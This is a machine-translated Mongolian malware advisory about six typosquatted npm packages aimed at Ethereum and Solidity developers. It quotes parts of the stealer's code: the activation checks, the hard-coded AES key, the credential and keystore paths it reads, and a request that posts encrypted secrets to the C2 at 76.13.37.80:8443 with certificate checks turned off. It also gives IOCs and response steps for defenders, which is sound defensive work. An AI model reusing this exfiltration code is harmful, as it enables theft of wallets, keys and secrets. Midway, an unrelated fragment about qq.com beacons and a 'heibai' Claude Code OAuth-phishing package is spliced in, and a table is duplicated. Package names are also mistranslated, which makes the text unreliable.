TL, DR
2026 оны 5-р сарын 6-нд ганц npm нийтлэгч, namikazesarada010206, Ethereum, Solidity болон DeFi хөгжүүлэгчдийн экосистемийг чиглэсэн зургаан хортой багцыг түгээжээ.
Багцууд, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsБолон web3-utils-core, алдартай Web3 хэрэгслүүдэд туслах номын сан шиг харагдахаар бүтээгдсэн боломжит нэрсийг ашигласан.
Зургаан багц бүгд ижил зүйлийг агуулсан байв telemetry.js файл. Файл нь кластер даяар байтаар ижил байсан бөгөөд SHA-256-тай байсан:
Хортой програм хангамж нь суулгах үед ажилладаггүй. preinstall or postinstall дэгээ. Үүний оронд багцыг импортлох үед идэвхждэг require().
Энэ нарийн ширийн зүйл чухал.
Суулгац нь хөгжүүлэгч багцыг үнэхээр ашиглах хүртэл хүлээдэг. Дараа нь ажлын станц нь жинхэнэ Ethereum / Solidity хөгжүүлэлтийн орчин шиг харагдаж байгаа эсэхийг шалгадаг. Энэ нь Alchemy эсвэл Infura түлхүүр, хувийн түлхүүр, мнемоник, байршуулагч түлхүүр эсвэл орон нутгийн Foundry лавлахыг хайдаг.
Хэрэв хост таарвал хулгайч нь SSH хувийн түлхүүрүүд, Foundry / Geth / Brownie түрийвчний түлхүүрийн сангуудыг цуглуулдаг. .env* файлууд болон мэдрэмтгий орчны хувьсагчууд. Энэ нь хатуу кодлогдсон нууц үг ашиглан багцыг AES-256-GCM ашиглан шифрлэж, TLS баталгаажуулалтыг идэвхгүй болгосноор түүхий IPv4 C2 төгсгөлийн цэг рүү шүүж гаргадаг.
Xygeni-ийн хортой програм хангамжийн эрт анхааруулга (MEW) систем нь зургаан багцыг бүгдийг нь хортой болохыг баталгаажуулсан. npm бүртгэлийн устгалын тайлангийн багц хүлээгдэж байна.
Кластер: Зургаан багц, нэг хэвлэн нийтлэгч
Нийтлэгчийн бүртгэл namikazesarada010206 баталгаажаагүй Gmail хаягтай холбогдсон байсан namikazesarada010206@gmail.com.
Энэхүү кампанит ажил нь 2026 оны 5-р сарын 6-нд нэг өдрийн хэвлэлийн үеэр гарч ирсэн. Бүх зургаан багцыг дараах байдлаар хувилбарласан. 1.0.0, ажиллах хугацааны хамааралгүй байсан бөгөөд зөвхөн гурван файл илгээсэн:
package.json index.js telemetry.js Тэд мөн ижил эх сурвалжийн репозиторыг зарласан:
https://github.com/harunosakura030303-maker/evmchain-config Эхний гурван багцыг MEW сканнерууд анхны хэвлэлтээр илрүүлсэн. Үлдсэн гурван багцыг хэвлэн нийтлэгчийн npm профайлыг шинжээч хянасны дараа хүчээр тэмдэглэсэн. Нэгэнт ижил байттай байсан telemetry.js кластер даяар батлагдсан боловч тэдгээрийг тогтвортой байдлын дагуу хортой гэж хаасан.
| Багц | хувилбар | npm Нийтлэгдсэн | MEW тасалбар | шийтгэл |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Хортой |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Хортой |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | Хортой |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Хортой, тууштай байдлаар |
| цутгах үйлдвэрийн хэрэгслүүд | 1.0.0 | 2026-05-06 | #51071 | Хортой, тууштай байдлаар |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Хортой, тууштай байдлаар |
Нэрлэх стратеги нь энгийн боловч үр дүнтэй байдаг.
Эдгээр багцууд нь яг дээд урсгалын нэрийг дуурайдаггүй. Үүний оронд тэд "хэрэглээний" гэх мэт итгэмээр дагаваруудыг ашигладаг. -core, -utilsБолон -utils-coreЭнэ нь тэдгээрийг хөгжүүлэгч Web3 хэрэгслийн ойролцоо харахыг хүсч болох хамтрагч сангууд шиг харагдуулдаг.
| Хортой багц | Хууль ёсны бай |
|---|---|
| viem-core | viem бол алдартай Ethereum TypeScript үйлчлүүлэгч юм |
| viem-utils-core | вьем |
| hardhat-core-utils | хатуу малгай, үндсэн урсгал болох Solidity хөгжүүлэлтийн орчин |
| evm-utils | Ерөнхий EVM хэрэгслийн нэрийн орон зай |
| цутгах үйлдвэрийн хэрэгслүүд | цутгах үйлдвэр, Solidity хэрэгслийн гинж |
| web3-utils-core | web3-utils, Web3.js туслагчид |
Энэ бол “нэмэлт багц”-ын хэв маяг юм: “Би бол жинхэнэ багц” биш, харин “Би жинхэнэ багцын эргэн тойронд боломжийн туслагч шиг харагдаж байна”.
Хурдан хөдөлж буй DeFi хөгжүүлэгчдийн хувьд энэ нь эрсдэл үүсгэхэд хангалттай юм.
Багцыг импортлоход юу болох вэ
Халдлагын гинжин хэлхээ нь жижиг, санаатай бөгөөд крипто хөгжүүлэлтийн орчинд төвлөрсөн байдаг.
Суурилуулах дэгээ байхгүй. Үүний оронд багц бүр нь дараах зүйлсийг агуулдаг index.js энэ нь stub функцийг экспортолж, дараа нь хортой телеметрийн модулийг ачаалдаг.
require('./telemetry').init(); Энэ нь хортой програм хангамж анх импортлох үед идэвхждэг гэсэн үг юм.
Энэ нь халдагчийн хувьд үйл ажиллагааны хувьд ашигтай байдаг. Олон сканнер болон хамгаалагдсан хязгаарлагдмал орчин нь суулгах хугацааны зан төлөвт анхаарлаа төвлөрүүлдэг. Энэ багц нь хөгжүүлэгч, бүтээх скрипт, туршилтын багц эсвэл ажиллах хугацааны замд ашиглагдах хүртэл хүлээдэг.
Идэвхжүүлэх хаалга: Зөвхөн бодит Web3 хөгжүүлэгчийн ажлын станцууд дээр л гал асаах
Суулгацын хамгийн чухал хэсэг бол идэвхжүүлэх хаалга юм.
Хортой програм хангамж нь Ethereum / Solidity хөгжүүлэгч машинууд дээр түгээмэл байдаг орчны хувьсагчдыг шалгадаг:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Мөн Foundry суулгасан эсэхийг шалгадаг:
fs.existsSync(path.join(os.homedir(), '.foundry')) Хэрэв аль ч нөхцөл үнэн биш бол функц буцаж ирээд юу ч хийхгүй.
Энэ нь ерөнхий шинжилгээний орчинд багцыг илүү чимээгүй болгодог. Foundry, Alchemy түлхүүр, Infura түлхүүр, хувийн түлхүүр эсвэл мнемоникгүй хамгаалагдсан орчинд гэм хоргүй харагдах импорт гарч болзошгүй.
Тохирох хост дээр хортой програм хангамж цуглуулахаасаа өмнө 60-90 секунд хүлээнэ:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Саатал нь импорт болон гадагшлуулах хоёрын илэрхий хамаарлыг бууруулдаг. .unref() Хэрэв багцыг богино хугацааны скриптээр импортолсон бол call нь хост процессыг хэвийн ажиллахаар гаргах боломжийг олгодог.
Энэ бол чимээ шуугиантай эвдэж булаах үйлдэл биш. Энэ нь хөгжүүлэгчийн орчноос хулгайлах нь үнэ цэнэтэй биш л бол ажиллуулахаас зайлсхийх зорилгоор бүтээгдсэн зорилтот хулгай юм.
Хулгайч юу цуглуулдаг вэ
Идэвхжүүлэх хаалга өнгөрсний дараа хортой програм хангамж нь Web3 хөгжүүлэлтэд хамгийн чухал эх сурвалжуудаас цуглуулдаг: хувийн түлхүүр, түрийвчний түлхүүрийн сан, байршуулалтын итгэмжлэл, үүлэн нууц, npm токен болон орон нутгийн төслийн тохиргоо.
| Эх сурвалж | Юу цуглуулсан бэ |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i-тэй тохирох дурын хувьсагч |
| ~/.ssh/* | Файлын бүрэн агуулгыг багтаасан PRIVATE KEY эсвэл BEGIN OPENSSH агуулсан файлууд |
| ~/.цохилтын үйлдвэр/түлхүүрийн дэлгүүрүүд/* | Foundry түрийвчний түлхүүр хадгалах файлууд |
| ~/.ethereum/түлхүүр хадгалах газар/* | Гет түрийвчний түлхүүрийн сангийн файлууд |
| ~/.brownie/accounts/* | Брауни түрийвчний түлхүүр хадгалах файлууд |
| ${cwd}/.env | Файлын бүрэн агуулга |
| ${cwd}/.env.local | Файлын бүрэн агуулга |
| ${cwd}/.env.production | Файлын бүрэн агуулга |
| ${cwd}/.env.development | Файлын бүрэн агуулга |
| os.hostname() | Хостын мета өгөгдөл |
| crypto.randomUUID() | Хохирогч/сессийн танигч |
| Огноо.одоо() | Цуглуулгын цагийн тэмдэг |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA жетонууд нь:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Бид телеметр нь операторын өөрийн аналитик эсвэл тусад нь мөнгөжүүлсэн суваг эсэхийг баталгаажуулж чадаагүй байна. Бидний судалсан хоёр дээжинд ATTA жетонууд ижил байна.
Б бүлэг: хэйбай
claude.hk OAuth Фишинг + ANTHROPIC_BASE_URL Хулгай
Дөрөвдүгээр сарын 1-ний дээж бол кампанит ажлын хамгийн эртний, хамгийн бүдүүлэг хэсэг юм.
heibai:2.1.88-claude.hk-4 нийтэлсэн wuguoqiangvip28, 2025 оны 6-р сарын 7-нд үүсгэсэн бүртгэл. Багц нь өөрийгөө хууль ёсны дагуу илт эсэргүүцсэн. 2.1.88 Хүний гарал үүслийн ялгаруулалт.
Энэ нь CA-certificat MITM-тэй холбоотой асуудал үүсгэдэггүй. Үүний оронд энэ нь хэрэглэгчдэд OAuth төгсгөлийн цэгийн талаар худал хэлдэг.
Алдагдсан Клод Кодын эх сурвалжийн дээр байрлах хортой нэмэлтүүдэд дараахь зүйлс орно.
| Эх сурвалж | Юу цуглуулсан бэ |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i-тэй тохирох дурын хувьсагч |
| ~/.ssh/* | Файлын бүрэн агуулгыг багтаасан PRIVATE KEY эсвэл BEGIN OPENSSH агуулсан файлууд |
| ~/.цохилтын үйлдвэр/түлхүүрийн дэлгүүрүүд/* | Foundry түрийвчний түлхүүр хадгалах файлууд |
| ~/.ethereum/түлхүүр хадгалах газар/* | Гет түрийвчний түлхүүрийн сангийн файлууд |
| ~/.brownie/accounts/* | Брауни түрийвчний түлхүүр хадгалах файлууд |
| ${cwd}/.env | Файлын бүрэн агуулга |
| ${cwd}/.env.local | Файлын бүрэн агуулга |
| ${cwd}/.env.production | Файлын бүрэн агуулга |
| ${cwd}/.env.development | Файлын бүрэн агуулга |
| os.hostname() | Хостын мета өгөгдөл |
| crypto.randomUUID() | Хохирогч/сессийн танигч |
| Огноо.одоо() | Цуглуулгын цагийн тэмдэг |
Зорилтот жагсаалт нь маш тодорхой байна. Энэ нь ерөнхий хөтөч хулгайлах эсвэл өргөн хүрээтэй итгэмжлэлийг хусах явдал биш юм. Энэ нь Ethereum програмуудыг бүтээх, турших, байршуулах эсвэл ажиллуулах хөгжүүлэгчдэд чиглэгддэг.
Foundry, Geth, болон Brownie түлхүүрийн сангуудыг оруулах нь онцгой чухал юм. Эдгээр файлууд нь түрийвч эсвэл байршуулалтын таних тэмдэгт шууд хандах эрхийг илэрхийлж болно. Хэрэв халдагч тэдгээрийг нууц үг, мнемоник эсвэл орчны нууцтай хослуулж чадвал тэд хөрөнгө шилжүүлэх, байршуулагчийн дүрд тоглох эсвэл ухаалаг гэрээний үйл ажиллагааг алдагдуулах боломжтой байж магадгүй юм.
Шүүлтүүрээс өмнө шифрлэлт
Хортой програм хангамж нь цуглуулсан өгөгдлийг илгээхээсээ өмнө шифрлэдэг.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Хатуу кодлогдсон нууц үг нь:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Эцсийн ачааллыг JSON хэлбэрээр ороосон байна:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Шифрлэлт нь хортой програм хангамжийг өөрөө илүү дэвшилтэт болгодоггүй. Гэсэн хэдий ч энэ нь сүлжээний шалгалтыг хүндрүүлдэг. Гаралтыг ажиглаж буй хамгаалагч нь JSON-ийн ашигтай ачааллыг харах боловч хулгайлагдсан түлхүүр, түрийвчний файл гэх мэтийг харахгүй. .env хатуу кодлогдсон нууц үг болон тайлах логикгүй агуулга.
Түүхий IPv4 C2 руу нэвтрэлт
Шүүлтүүрийн замыг хатуу кодчилсон байна:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Хортой програм хангамж нь өгөгдлийг дараах руу илгээдэг:
https://76.13.37.80:8443/api/v1/telemetry Хоёр дэлгэрэнгүй мэдээлэл онцолж байна.
Нэгдүгээрт, C2 нь домэйн биш харин түүхий IPv4 хаяг юм. Энэ нь домэйн бүртгэлийн хэрэгцээг арилгаж, домэйнд суурилсан зарим илрүүлэлтээс зайлсхийдэг.
Хоёрдугаарт, TLS баталгаажуулалтыг дараах байдлаар идэвхгүйжүүлнэ:
rejectUnauthorized: false Энэ нь хортой програм хангамжид өөрөө гарын үсэг зурсан гэрчилгээ зэрэг аливаа гэрчилгээг хүлээн авах боломжийг олгодог. Өөрөөр хэлбэл, халдагч хүчин төгөлдөр олон нийтийн гэрчилгээ шаардалгүйгээр шифрлэгдсэн дамжуулалтыг авдаг.
Дахин оролдох логик болон нөөц хост байхгүй. Алдаа чимээгүй залгигддаг. Энэ нь C2 офлайн эсвэл холбогдох боломжгүй үед багцыг чимээгүй байлгадаг.
Энэ кампанит ажил яагаад чухал вэ?
Хөгжүүлэгчдэд чиглэсэн ихэнх хортой npm багцууд нь өргөн хүрээний итгэмжлэлүүдийг хөөдөг: npm жетон, AWS түлхүүр, GitHub жетон гэх мэт. .npmrc файлууд.
Энэ кампанит ажил нь зорилтот хүрээг нарийсгаж байна.
Энэ нь уг машин нь Ethereum эсвэл Solidity хөгжүүлэгчийнх болохыг харуулсан шинж тэмдгүүдийг хайдаг. Дараа нь тухайн орчинд чухал ач холбогдолтой хөрөнгийг яг таг татаж авдаг: түрийвчний түлхүүр хадгалах газар, хувийн түлхүүр, мнемоник, байршуулагч түлхүүрүүд, .env файлууд болон SSH түлхүүрүүд.
Энэ нь кампанит ажлыг Web3 багуудын хувьд ердийн npm хулгайлагчаас илүү аюултай болгодог.
Амжилттай халдвар авсан тохиолдолд дараахь зүйлийг илрүүлж болно.
- Байршуулалтын түрийвчнүүд
- Ухаалаг гэрээний админ түлхүүрүүд
- RPC үйлчилгээ үзүүлэгчийн түлхүүрүүд
- Үүлэн байршуулалтын итгэмжлэлүүд
- npm токен нийтлэх
- Хөгжүүлэгч эсвэл бүтээн байгуулалтын дэд бүтцэд SSH хандалт хийх
- Төслийн нууцууд хадгалагдсан
.envфайлууд - Foundry, Geth эсвэл Brownie-д зориулсан түрийвчний түлхүүрийн дэлгүүрүүд
Багцын нэрс нь мөн тодорхой нийгмийн инженерчлэлийг харуулж байна. Тэд танил хэрэгслийн нэрсээр дамжуулан Web3 хөгжүүлэгчийн экосистемийг чиглүүлдэг: viem, hardhat, foundry, evmБолон web3.
Жүжигчин бодит төслүүдээс буулт хийх шаардлагагүй. Тэдэнд зөвхөн боломжийн хамтрагч багц шиг харагдах зүйлийг суулгахын тулд хөгжүүлэгч л хэрэгтэй.
Буулт ба илрүүлэлтийн үзүүлэлтүүд
| Багцууд болон Хэвлэн нийтлэгч | |
|---|---|
| хээрийн | үнэ цэнэ |
| npm нийтлэгч | namikazesarada010206 |
| Нийтлэгчийн имэйл хаяг | namikazesarada010206@gmail.com |
| Имэйлийг баталгаажуулсан | Үгүй |
| SCM шалгаж байна | Үгүй |
| Нэр хүндийн оноо | 1.0 |
| Багцууд нь | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, döküm-utils, web3-utils-core |
| Хувилбарууд | Бүх 1.0.0 |
| Эх сурвалжийн репозитор | https://github.com/harunosakura030303-maker/evmchain-config |
| Хортой гэж батлагдсан | Бүх зургаан багц |
| Сүлжээний | |
|---|---|
| Төрөл: | үнэ цэнэ |
| C2 төгсгөлийн цэг | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| C2 порт | 8443/tcp |
| TLS зан төлөв | Зөвшөөрөлгүй татгалзсан: худал |
| Ачааллын схем | {"v":2,"iv": "d": "т": } |
| Файлууд болон Хэшүүд | |
|---|---|
| Төрөл: | үнэ цэнэ |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Багцын зохион байгуулалт | package.json, index.js, telemetry.js |
| Файлын тоо | 3 |
| Ойролцоогоор нийт хэмжээ | 3.4 KB |
Идэвхжүүлэх дохионууд
Хортой програм хангамж нь эдгээр орчны хувьсагчдыг шалгадаг:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Энэ нь мөн дараах зүйлсийг шалгадаг:
~/.foundry/ Зорилтот хост замууд
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Цуглуулгын тогтмол байдал
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Илрүүлэлтийн тэмдэглэл
Бүрэн зан үйлийн шинжилгээ хийх шаардлагагүйгээр энэ кампанит ажлыг хэд хэдэн дүрмээр барьж авдаг.
Эхлээд lockfile-уудыг зургаан хортой багцын нэрийг хайж олоорой:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Дурын тоглолт package-lock.json, yarn.lock, pnpm-lock.yaml, эсвэл node_modules Түүхийг ноцтой үйл явдал гэж үзэх хэрэгтэй.
Хоёрдугаарт, түрийвчний түлхүүр хадгалах замыг уншиж буй Node.js процессуудыг хянах:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Туслах хамааралтай байдлаар импортлогдсон багцын хувьд энэ нь ховор тохиолдолд хууль ёсны зан төлөв юм. Энэ нь ялангуяа гадагш чиглэсэн сүлжээний үйл ажиллагааны дараа сэжигтэй байдаг.
Гуравдугаарт, HTTPS холболтуудыг хаах эсвэл анхааруулах:
76.13.37.80:8443 Ялангуяа хүсэлтийн зам нь:
/api/v1/telemetry Дөрөвдүгээрт, эдгээр шинж чанаруудыг хослуулсан npm багцуудыг хайж олоорой:
- Шинэ эсвэл нэр хүнд багатай хэвлэн нийтлэгч
- Баталгаажаагүй Gmail бүртгэл
- Web3-ийн зэргэлдээ багцын нэр
- Агуулахын утга учиртай түүх байхгүй
- Жижиг багцын зохион байгуулалт
index.jsтелеметрийн эсвэл туслах файлыг ачаалдаг- Ажиллах хугацааны хамаарал байхгүй
- Мэдрэмтгий орчны хувьсагчийн цуглуулга
- Түрийвчний түлхүүрийн дэлгүүрт хандах
Энэ загвар нь ганц IOC-оос илүү ашигтай, учир нь дараагийн багц нь IP хаягийг өөрчилж болох ч чиглүүлэлтийн логикийг хэвээр хадгалж магадгүй юм.
Буулт хийх хариу арга хэмжээний шалгах хуудас
Хэрэв хөгжүүлэгч зургаан багцын аль нэгийг ашигласан бөгөөд тэдний орчин идэвхжүүлэх хаалгатай таарч байвал ажлын станцыг эрсдэлд орсон гэж үзнэ үү.
Үүнд Foundry суулгасан машинууд, орчин дахь Alchemy эсвэл Infura түлхүүрүүд, хувийн түлхүүрүүд, мнемоникууд, эсвэл байршуулагч түлхүүрүүд багтана.
Санал болгож буй хариулт:
- Хостыг сүлжээнээс салга.
- Хамгаалах
node_modules, цоожны файлууд, бүрхүүлийн түүх болон шүүх эмнэлгийн холбогдох бүртгэлүүд. - SSH товчлуурын хослол бүрийг доор эргүүлнэ үү
~/.ssh/. - Доорх түлхүүрийн дэлгүүр бүрийн түрийвчний түлхүүрүүдийг эргүүлнэ үү
~/.foundry,~/.ethereumБолон~/.brownie. - Хөрөнгөө шинэ түрийвч рүү шилжүүл.
- Хадгалсан бүх нууцыг эргүүлнэ үү
.env*хөгжүүлэгчийн ажиллаж байсан репозитор дахь файлууд. - AWS түлхүүрүүд, npm жетонууд, байршуулах жетонууд, API түлхүүрүүд, хувийн түлхүүрүүд, үрүүд болон мнемоникууд зэрэг цуглуулгын тогтмол мэдээлэлтэй тохирох орчны нууцуудыг эргүүлэх.
- Багцыг анх суулгаснаас хойшхи үүлэн технологи, npm, GitHub, RPC үйлчилгээ үзүүлэгч болон блокчэйн үйл ажиллагааг аудит хийсэн.
- Дахин ашиглахаасаа өмнө ажлын станцын зургийг дахин дүрслээрэй.
Хамгаалагчид юу авч явах ёстой вэ
Энэхүү кампанит ажил нь өндөр үнэ цэнэтэй хөгжүүлэгч экосистемийн эргэн тойронд npm typoskvotting хэрхэн хөгжиж байгааг харуулж байна.
Жүжигчинд тууштай байдал хэрэггүй байсан. Тэдэнд төөрөгдөл хэрэггүй байсан. Тэдэнд суулгах хугацаанд гүйцэтгэх ч шаардлагагүй байсан.
Үүний оронд тэд гурван зүйлд найдсан:
- Боломжтой Web3 багцын нэрс
- Зөвхөн жинхэнэ крипто хөгжүүлэлтийн машинууд дээр идэвхжүүлэлт
- Ethereum хөгжүүлэгчдэд хамгийн чухал файлууд болон нууцуудыг шууд хулгайлах
Энэ нь кампанит ажлыг өргөн хүрээтэй сканнердах үед алдахад хялбар бөгөөд зөв орчинд буухад аюултай болгодог.
Web3 багуудын хувьд хичээл тодорхой байна: хамаарлын нэрийг аюул заналын загварынхаа нэг хэсэг гэж үз. Хор хөнөөлгүй туслагч шиг харагдах багц нь түрийвчний буулт хийх хамгийн богино зам болж чадна.
npm бүртгэлд мэдээлсэн. Нийтлэгчийн бүртгэл болон багцуудыг устгасны дараа бид энэ бичлэгийг шинэчлэх болно.




